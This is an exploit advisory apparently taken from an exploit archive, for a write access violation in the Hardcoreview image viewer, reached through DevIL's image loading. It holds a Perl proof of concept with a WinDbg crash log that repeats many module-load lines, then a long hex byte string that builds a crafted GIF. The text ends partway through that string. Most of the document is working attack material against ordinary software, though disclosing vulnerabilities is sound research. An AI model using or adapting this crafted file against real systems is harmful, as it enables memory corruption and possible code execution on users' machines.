Hardcorereview WriteAV Arbitrary Code Execution

2012.10.05
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/perl # Hardcoreview WriteAV Arbitrary Code Execution # Author: Jean Pascal Pereira <pereira@secbiz.de> # Vendor URI: http://sourceforge.net/projects/hardcoreview/ # Vendor Description: # Image browser. Designed and created for profesional and amature watching image files. # All kind of image files ;) . Support *.jpg, *.gif, *.bmp, *.psd, and many more. # Debug info: # Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 # Copyright (c) Microsoft Corporation. All rights reserved. # # CommandLine: "C:\Program Files\hardcoreview\hardcoreview.exe" C:\research\hcview\crafted.gif # Symbol search path is: *** Invalid *** # **************************************************************************** # * Symbol loading may be unreliable without a symbol search path. * # * Use .symfix to have the debugger choose a symbol path. * # * After setting your symbol path, use .reload to refresh symbol locations. * # **************************************************************************** # Executable search path is: # ModLoad: 00400000 00443000 hardcoreview.exe # ModLoad: 7c900000 7c9b2000 ntdll.dll # ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll # ModLoad: 5ed00000 5edcc000 C:\WINDOWS\system32\OPENGL32.dll # ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll # ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll # ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll # ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll # ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll # ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll # ModLoad: 68b20000 68b40000 C:\WINDOWS\system32\GLU32.dll # ModLoad: 73760000 737ab000 C:\WINDOWS\system32\DDRAW.dll # ModLoad: 73bc0000 73bc6000 C:\WINDOWS\system32\DCIMAN32.dll # ModLoad: 10000000 102be000 C:\Program Files\hardcoreview\DevIL.dll # ModLoad: 7c420000 7c4a7000 C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCP80.dll # ModLoad: 78130000 781cb000 C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCR80.dll # ModLoad: 00350000 00365000 C:\Program Files\hardcoreview\ILU.dll # ModLoad: 00380000 0038f000 C:\Program Files\hardcoreview\ILUT.dll # ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\comdlg32.dll # ModLoad: 5d090000 5d12a000 C:\WINDOWS\system32\COMCTL32.dll # ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll # ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll # ModLoad: 003a0000 003b5000 C:\Program Files\hardcoreview\pthreadVC2.dll # ModLoad: 71ad0000 71ad9000 C:\WINDOWS\system32\WSOCK32.dll # ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll # ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll # ModLoad: 78480000 7850e000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\MSVCP90.dll # ModLoad: 78520000 785c3000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\MSVCR90.dll # (e4c.8c8): Break instruction exception - code 80000003 (first chance) # ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL # ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll # ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll # ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll # ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll # ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime # ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 61dd0000 61dd6000 C:\WINDOWS\system32\MCD32.DLL # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll # ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll # *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - # (e4c.8c8): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=0151adc0 ebx=01510178 ecx=0151edf0 edx=d9f3d1b1 esi=0151adb8 edi=01510000 # eip=7c9108f3 esp=0012fb00 ebp=0012fbbc iopl=0 nv up ei ng nz ac pe cy # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297 # ntdll!wcsncpy+0x374: # 7c9108f3 8902 mov dword ptr [edx],eax ds:0023:d9f3d1b1=???????? # 0:000> g;r;!exploitable -v;q # (e4c.8c8): Access violation - code c0000005 (!!! second chance !!!) # eax=0151adc0 ebx=01510178 ecx=0151edf0 edx=d9f3d1b1 esi=0151adb8 edi=01510000 # eip=7c9108f3 esp=0012fb00 ebp=0012fbbc iopl=0 nv up ei ng nz ac pe cy # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000297 # ntdll!wcsncpy+0x374: # 7c9108f3 8902 mov dword ptr [edx],eax ds:0023:d9f3d1b1=???????? # HostMachine\HostUser # Executing Processor Architecture is x86 # Debuggee is in User Mode # Debuggee is a live user mode debugging session on the local machine # Event Type: Exception # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCR80.dll - # *** WARNING: Unable to verify checksum for C:\Program Files\hardcoreview\DevIL.dll # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\hardcoreview\DevIL.dll - # *** ERROR: Module load completed but symbols could not be loaded for hardcoreview.exe # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll - # Exception Faulting Address: 0xffffffffd9f3d1b1 # Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) # Exception Sub-Type: Write Access Violation # Exception Hash (Major/Minor): 0x69293f33.0x12365f02 # Stack Trace: # ntdll!wcsncpy+0x374 # MSVCR80!free+0xcd # DevIL!icalloc+0x49 # DevIL!ilDxtcDataToImage+0x2e7f # DevIL!ilDxtcDataToImage+0x308c # DevIL!ilDxtcDataToImage+0x30e4 # hardcoreview+0x41ba # kernel32!RegisterWaitForInputIdle+0x49 # Instruction Address: 0x000000007c9108f3 # Proof of Concept: my $crafted = "\x47\x49\x46\x38\x39\x61\x32\x00\x32\x00\xF7\x00\x00\x00\x00\x00". "\xFF\xFF\xFF\xE0\x29\x3F\x6F\x2D\x30\xB9\x78\x7A\xD9\x45\x4C\xA4". "\x82\x84\xE6\x26\x35\xE8\x27\x39\xE6\x29\x3A\xD3\x2C\x3B\xDD\x30". "\x40\xDE\x34\x43\x6A\x1C\x23\x5B\x19\x1F\xE6\x27\x3B\xE6\x29\x3D". "\xE2\x28\x3D\xE8\x2A\x3E\xE6\x2A\x40\xE1\x29\x3D\xE0\x29\x3B\xEE". "\x2C\x40\xE4\x2A\x3F\xE2\x2A\x3F\xDF\x29\x3D\xEA\x2C\x42\xE0\x2A". "\x3F\xE0\x2A\x3D\xDF\x2A\x3D\xDF\x2A\x3F\xDE\x2A\x3B\xD9\x29\x3A". "\xE5\x2C\x41\xE4\x2D\x3F\xDC\x2B\x3F\xDB\x2C\x3E\xE2\x2E\x42\xDD". "\x2D\x3E\x7A\x1C\x27\x2D\x0F\x12\x2A\x16\x18\xE1\x21\x3B\xE3\x23". "\x3D\xE3\x25\x3D\xE6\x26\x3E\xE5\x26\x40\xDE\x25\x3B\xE3\x27\x3F". "\xED\x29\x42\xE2\x27\x3D\xE1\x27\x3D\xED\x2A\x45\xE2\x28\x3E\xE1". "\x28\x3F\xD7\x26\x3B\xE9\x2A\x41\xE2\x29\x40\xE1\x29\x3F\xE0\x29". "\x40\xE8\x2B\x44\xDF\x29\x40\xDF\x29\x3F\xDD\x29\x40\xD4\x27\x3F". "\xE3\x2B\x43\xE0\x2A\x40\xDA\x29\x3F\xE9\x2D\x47\xE3\x2C\x45\xE6". "\x2D\x45\xDF\x2C\x44\xDB\x2B\x40\xC9\x28\x3C\xE4\x2F\x48\xDC\x2D". "\x44\xD2\x2C\x43\xC6\x2B\x3F\xAA\x27\x39\x2C\x0A\x0E\x8F\x21\x2E". "\x91\x2B\x38\x4A\x1B\x21\xE9\x26\x42\xE1\x27\x42\xEC\x2A\x47\xDF". "\x28\x42\xDC\x2F\x49\xD0\x30\x49\xD0\x31\x4A\xED\xA9\xB3\xCC\x31". "\x4D\xC8\x34\x4F\xC7\x34\x4F\x8D\x71\x76\xC9\x32\x4F\xCF\x35\x53". "\xC7\x34\x51\xC2\x37\x53\x3B\x19\x20\xBB\x3A\x57\x2B\x20\x23\xAF". "\x40\x60\x14\x0E\x10\xC6\x95\xA6\x24\x1C\x1F\x22\x14\x1A\x18\x11". "\x14\x88\x41\x63\xBF\x96\xAC\x1F\x1A\x1D\x0D\x04\x0C\x1A\x16\x1A". "\x17\x15\x18\x8B\x81\x90\x25\x23\x27\x1B\x19\x22\x0F\x0E\x17\x7F". "\x7C\x9B\x88\x8E\xBE\x73\x82\xBD\x4C\x55\x79\x91\xA6\xF3\x84\x95". "\xCB\x63\x74\x9F\xD1\xDB\xF4\xBB\xC0\xCC\x53\x64\x8B\x8D\xA9\xE9". "\x37\x4A\x71\x8D\xAE\xF4\x86\xA3\xDE\xD6\xE3\xFE\x93\xB6\xF6\x8B". "\xB3\xF5\x8B\xAF\xEC\x23\x31\x46\x11\x1C\x1E\x0F\x12\x12\x09\x14". "\x0E\x0D\x0B\x06\x07\x06\x04\x17\x12\x0C\xD2\xAC\x87\x0D\x0C\x0B". "\x15\x14\x13\xBE\x92\x6D\xD0\xA4\x83\xD0\xA0\x7E\x27\x1E\x18\xCA". "\x9D\x7F\x89\x5D\x40\x95\x67\x4B\xAC\x7B\x5B\xA1\x72\x55\xB7\x86". "\x68\xC4\x93\x74\xD1\xA5\x89\x41\x2D\x21\x8C\x64\x4E\xCE\x97\x79". "\xBC\x8C\x71\xDB\xA4\x85\xE0\xA9\x8B\xC3\x95\x7B\xB1\x89\x72\xD2". "\xA3\x88\xDA\xAB\x8F\xCE\xA0\x87\xBB\x92\x7A\x1A\x15\x12\x1E\x16". "\x12\xD1\x9A\x7F\x9A\x74\x61\xD8\xA4\x8A\xC7\x98\x7F\x53\x3F\x35". "\xD8\xA6\x8D\x9B\x7F\x71\xC1\xA3\x94\x4E\x33\x26\x6D\x49\x39\x7C". "\x53\x41\xCC\x94\x7B\xC3\x8E\x76\xD4\x9E\x85\xE3\xAD\x94\xCC\x9B". "\x85\xC2\x99\x85\xCA\xA0\x8D\xD5\xA9\x95\xC3\x9E\x8D\xB5\x94\x85". "\xEB\xD8\xCF\x24\x15\x0F\xC1\x86\x6E\xB4\x7D\x67\xCD\x90\x77\xA6". "\x76\x63\xD8\x9C\x83\xDC\xA2\x8A\xD7\xA0\x88\xAA\x7E\x6B\xD5\xA2". "\x8E\xD3\xA1\x8D\xDA\xA9\x94\xE3\xB1\x9C\xDE\xAC\x98\xBE\x93\x82". "\xE6\xB6\xA3\xBF\x98\x88\xCE\x95\x81\xC6\x94\x81\xDB\xA5\x91\xD4". "\xA5\x94\xB1\x8B\x7D\xA9\x85\x77\xE0\xB7\xA7\x60\x40\x36\xBB\x83". "\x70\xD4\x9D\x8A\xB2\x83\x74\x90\x6B\x5F\xB9\x8B\x7C\x6D\x53\x4A". "\x35\x21\x1B\xC3\x9E\x94\x7F\x61\x59\xA3\x80\x77\xD2\xA9\x9F\xCA". "\xA3\x99\x23\x15\x12\x1E\x19\x18\xDE\xCA\xC6\x30\x15\x10\x16\x0A". "\x08\xDC\x8E\x80\x39\x27\x24\xD2\x79\x6B\xDC\x85\x77\x19\x12\x11". "\xD3\xA0\x98\x2F\x1D\x1B\xED\xBC\xB6\xAB\x4F\x47\x24\x18\x17\xBB". "\x95\x92\xAD\x6E\x6A\xD9\x5C\x5C\xB7\x6A\x69\x1E\x16\x16\x19\x15". "\x15\x2E\x28\x28\x08\x07\x07\xA8\xA5\xA5\xFF\xFF\xFF\x21\xF9\x04". "\x01\x00\x00\xFF\x00\x2C\x00\x4B\x00\x00\x32\x00\x32\x00\x00\x08". "\xFF\x00\x03\x08\x1C\x48\xB0\xA0\xC1\x83\x08\x13\x2A\x5C\xC8\xB0". "\x21\x43\x32\x5F\xB8\x48\x9C\x38\xF1\xCB\x97\x2E\x5F\xB6\x5C\x0C". "\xC3\x65\x8B\x46\x8B\x5D\x30\x5A\x1C\x79\xB1\x0B\x45\x89\x5B\xCC". "\x18\x64\x22\xA0\xA5\xCB\x97\x02\x32\x64\x40\x82\x84\x4A\x8E\x0A". "\x0F\x20\x98\x88\x00\xA1\xC3\x87\x08\x35\x90\x8C\xF0\x30\xD4\x86". "\x0D\x1D\x30\x5B\x86\x31\x88\x25\xE9\x4B\x0F\x1E\x5C\xB4\xB0\xD1". "\xC3\x46\x08\x1E\x41\x96\x14\x31\x42\x84\xC6\x04\x0A\x32\x6A\xF8". "\xF0\x31\x62\x04\x0C\xA4\x49\xC5\x30\x75\xDA\x52\x47\x8F\x1F\x3A". "\x28\x54\x90\x40\xC4\x49\x03\x07\x78\x1B\x9C\x70\xC2\x84\xC8\x04". "\x19\x30\x5C\x10\x15\x80\x16\xA6\xDA\x82\x4D\xD9\xFA\x80\x61\x63". "\x04\x8F\x2A\x4D\x4E\x3C\x61\x04\x69\x1D\x24\x46\xEB\xD6\xA9\x6B". "\xD0\x44\x49\x88\x16\x35\x46\xD8\xA8\xE1\xF4\x30\xC1\xC4\x30\x75". "\x78\x88\x09\xA1\xAE\x03\x14\xEB\x1C\xC5\x39\xB3\x46\x55\xA4\x35". "\x91\x16\x31\x42\x71\x82\x49\x15\x18\x19\x60\x90\x4E\xBB\xD6\x65". "\x0D\x0A\x3F\x6A\x74\xE8\x30\xC5\xC8\x09\x47\x67\xCE\x38\x82\x87". "\x1B\x9E\xA3\x48\x71\xE2\xA8\x82\xA7\x08\xD2\x18\x27\x26\x12\xF4". "\xFF\xE8\x51\xDA\x60\x96\x97\x14\x32\xEC\xD0\x21\x03\xC7\x95\x06". "\x8C\x1A\xAD\x93\xE7\x49\x9E\x3E\x7D\xB6\x23\x4D\x57\xC5\x3F\xB7". "\x23\x28\x55\x50\x40\x42\x79\x05\x9D\xE7\x92\x07\x1D\xC0\x20\x00". "\x0C\x55\x34\x00\xC9\x1B\xEB\xD0\x52\x4B\x2D\x9E\x08\xB3\xCA\x2A". "\xF0\xC0\xA3\xCA\x3E\x91\xC0\x73\x1F\x3A\xF7\x39\x61\xC1\x07\x04". "\x12\x64\xA0\x4B\x3E\x78\x10\x01\x11\x50\xAC\xD3\xCF\x3A\xB6\x60". "\x72\xC9\x25\xDA\x78\x62\x63\x38\xF5\xEC\x93\x1D\x3C\xE7\x54\xB2". "\x8A\x1A\x89\x84\xD3\x84\x04\x25\x0E\x74\xA2\x00\x36\x08\x30\xC2". "\x04\x4D\x08\x53\x59\x2D\x99\x64\xA2\x89\x26\x98\xD8\x52\x8B\x95". "\xB4\xE0\xB8\x8F\x3E\xAB\xB4\xD3\xCE\x2A\x71\xB8\x31\x40\x10\x17". "\x10\x57\xE0\x53\x61\x39\xC7\xC8\x1B\xB4\x44\x99\x09\x31\x6E\xCE". "\xA8\xC9\x27\x14\xD6\x83\x4E\x19\xE1\xD4\x08\x0F\x1D\xFC\x38\xA1". "\x81\x07\x49\xDA\xB0\x9A\x69\x46\xC2\x44\x81\x08\x49\xA8\x03\x89". "\x30\x9F\x6C\xB2\xC9\x30\x8E\x46\xAA\x89\xA3\x99\x5C\x42\x4B\x3D". "\x5E\x6A\xF3\x49\x38\x6E\xCC\x31\x40\x09\x1F\x50\xC1\x41\x0D\x83". "\x9A\x07\x13\x06\x46\xB4\x08\x49\x3B\xCA\x84\xE2\x2A\x27\x9C\x0C". "\xFF\x23\x09\x2E\xA1\xE0\x72\x0B\x29\xA1\x7C\x42\x0B\x3F\xB0\xD0". "\xD2\x4A\x2D\x70\xCC\xD1\x4E\x12\x13\x58\xD1\x41\x0D\x3B\x08\x40". "\xA8\x40\x47\xDA\x20\xC4\x11\x0E\x28\x72\x06\x2D\xDD\xE0\x82\x0B". "\x29\x9C\x14\xA3\xED\x2D\xAC\xB0\x02\x0A\x28\xD6\x62\xE2\x09\x2C". "\xDA\xD8\x02\x4E\x24\x73\xCC\x11\x05\x0D\x54\xA4\x47\xDE\xB2\x01". "\x1C\xA9\x03\x06\x40\x84\x03\xC7\xB4\xA5\xA4\xF2\x0A\x35\xDC\xDE". "\x72\xCB\x34\xB9\xE4\xC2\xCA\xBE\xB7\xE0\xF2\x09\x2C\x9F\xD8\x02". "\x8B\x23\x9D\x0E\xC0\xC3\x14\x15\xA4\xA8\xAC\xA9\x2F\x5D\xC0\x44". "\x3B\x74\x44\x02\x4B\x2A\xA9\x28\x83\x8D\x34\xD6\x54\xB3\x4C\x32". "\xDC\x30\xB3\x0C\x37\xC9\x30\xD3\x0B\x34\xDE\x68\x92\x89\x36\xF0". "\x34\x1C\x83\x10\x1F\xB8\x90\x2C\xBC\x47\x66\x00\x41\x12\xED\xA4". "\x01\x0F\x38\xD3\xB4\x02\x0E\x38\xE3\xC8\xC2\xCB\x32\xCF\x3C\xD3". "\x4C\x33\xCF\x58\x03\x8C\x2C\xB2\x78\x63\x8C\x24\xB6\xC0\x91\x86". "\xBA\x31\x90\x40\x82\x0B\x0A\xE2\xFC\xD2\x0E\x13\x28\x30\x46\x1A". "\x8E\xD8\x82\x4B\x2B\xE4\x78\x31\xCE\x38\xAD\xA4\xC2\x4D\x35\xD5". "\xC4\xB2\x8B\x2C\xE3\x0C\xCD\x36\xD5\xAA\xA4\xE1\x46\x14\x25\x3C". "\xFF\x30\x02\x92\x13\x9F\xE9\x92\x0D\x13\x30\x31\x06\x1D\xF0\x8C". "\xC3\x8B\x34\xE6\xF4\xE2\x38\x34\xAF\xB0\x72\x4C\x32\xB9\x50\x93". "\x2F\x35\xD0\x5C\x93\x0A\x27\xB6\xC4\x8C\x4E\x14\x46\xB4\x30\x42". "\x07\x2D\x79\x6D\x1C\x04\x4D\x8C\x71\x5F\x2D\xDB\x7C\x73\x0D\x39". "\xE3\x78\xF3\xCD\x37\xD0\xA0\x22\xB2\x24\xDF\x60\x23\xCB\x35\xC0". "\xA4\x62\x89\x2D\x6B\xAC\xB1\x0F\xE8\x36\x73\x50\x3A\xC5\x2D\xD5". "\xB0\xF3\x00\xE0\x9C\x63\xCB\x27\xDE\x18\xE0\x0D\x38\xDA\x90\x63". "\x0F\x30\xAD\x74\x83\x0D\x39\xDD\xD4\x02\x8B\x17\x6D\x5C\xE3\x8D". "\x36\x95\xA8\xB3\x8A\x13\x25\xCC\x60\x43\x04\x14\x04\x6E\x22\x4C". "\x39\x80\x40\x8F\x31\x29\xB4\xE2\x8B\x39\xE6\x88\x23\xCD\x37\xDD". "\x5C\x83\x0D\x26\x92\x88\x9E\x31\xD0\x66\x0F\x34\x48\x23\x15\x07". "\xC3\x04\x2D\x92\x50\x01\x01\x58\xE1\x38\xEE\x2B\xD4\x4B\x7A\x50". "\x01\x7A\x0C\x43\x1B\xC6\x70\x45\x3C\xCA\xE1\x8C\x66\xEC\xE2\x16". "\xDF\x68\x45\x28\x46\xA1\x0C\x65\x94\x82\x1A\xB1\x70\x45\x33\xAA". "\x71\x8A\x97\x19\x83\x1E\x37\x80\x40\x0D\x7A\x40\xBA\x08\x32\xEB". "\x25\x46\xA1\x40\x01\x8A\x51\x0B\x65\xB8\xC2\x17\xD9\xC8\x86\x35". "\xFF\x76\x81\x0A\x54\xBC\x22\x16\xBA\xA0\x04\x35\x48\x91\x8A\x5D". "\xC4\xC2\x19\xB1\x10\x05\x31\x6A\xA1\x89\x02\x0C\xC1\x06\x67\x19". "\x8B\x0D\xE3\x85\xC3\x1C\xCC\x80\x01\xEE\xB0\x05\x31\x62\x11\x8D". "\x79\x64\xA3\x19\xB1\x48\xDA\x32\x9A\xA1\x0B\x64\x98\x62\x19\xBB". "\x60\xC6\x33\xA2\xA1\x0B\x51\x18\xC3\x16\xEE\x30\x01\x16\x73\xB0". "\xA0\x24\x99\xCE\x25\x23\x68\xC1\x0B\xF0\x41\x8A\x61\x2C\xC3\x19". "\x41\x74\x86\x2E\xAA\xC1\x0D\x6E\xB0\x11\x19\xAC\x70\xE4\x1C\xA3". "\x31\x0A\x29\x0E\x03\x1F\x2A\x70\x01\x06\xA0\xC2\x98\x2D\x1E\x89". "\x28\x30\x78\x41\x01\x90\x71\x8B\x5D\x4C\xD2\x19\xC9\xD8\x06\x37". "\x9C\x11\x8D\x56\x22\x63\x1B\xD3\x78\x86\x33\x9C\x31\x0A\x50\x14". "\xE3\x1D\x26\x50\x41\x92\xCA\x72\x14\x4F\xBE\x24\x03\x11\xD8\xC1". "\x0F\x66\xF0\x8E\x5D\xB0\x82\x69\x8A\x2C\x06\x2C\x09\xB0\x0B\x6E". "\xE0\x62\x1A\xD3\xD8\x46\x35\x74\x31\x0A\x57\x80\x82\x12\xF8\x78". "\x81\x07\x74\xD0\xC9\x1A\x20\xE5\x8F\x48\x52\xD0\x0E\x06\xC9\x0E". "\x56\x24\x03\x19\xA7\x38\x86\xC9\xBA\x61\x0C\xDA\x29\xE3\x1B\xCD". "\x00\x98\x28\x8E\x91\x0B\x50\x88\x02\x93\x1B\x10\x40\x0D\x6A\x60". "\xFF\x94\xE3\x09\xAE\x2D\x8D\xD1\x41\x0D\x6E\x80\x8F\x5D\xE4\xE2". "\x18\xA6\xD8\x45\xFE\xEC\x21\x0E\xFC\xE9\xEF\x17\xBB\x20\x85\xB7". "\x28\x51\x0C\x7C\x84\xC0\x07\x6C\x01\x67\x4B\xFE\xE6\x02\x15\x14". "\x80\x15\x93\x98\x04\x2A\xA4\xF1\x8B\x59\x94\x23\x1E\x28\x2D\x87". "\x39\x7E\xC1\x0B\x89\x52\x62\x12\xEF\xF8\xC0\x0B\x46\xC0\x47\x33". "\xBD\x6F\x70\x30\x20\x4B\x0E\x56\xC0\x80\x62\x84\x74\x17\x99\xEB". "\x86\x32\xF2\x41\xD4\x7B\x10\xA0\x1B\xA5\x80\xC6\x24\x8E\x31\x09". "\x77\xB0\xE0\x07\x5C\x2B\xD2\x0D\x5F\x92\xC5\x11\x64\xE0\x05\xEE". "\xE8\x84\x25\xF6\xF5\x0D\x02\x78\x35\x1F\xE9\x08\x40\x3A\xBA\x11". "\xD6\x60\x50\x82\x12\xF3\x30\x88\x16\xB4\x10\x00\x2D\xF8\x12\x45". "\x8B\x11\x4B\x0F\x56\xF0\xD1\x64\x58\x22\x8E\xCC\x08\xC6\x40\x00". "\xB0\x57\x82\x00\xE0\xAF\x80\x15\x08\x5F\xDB\x8A\xBC\x96\xAC\xEF". "\x01\x2D\xA0\x02\x0C\x86\x40\x00\x54\x4C\xA2\x13\x22\x0D\x00\x60". 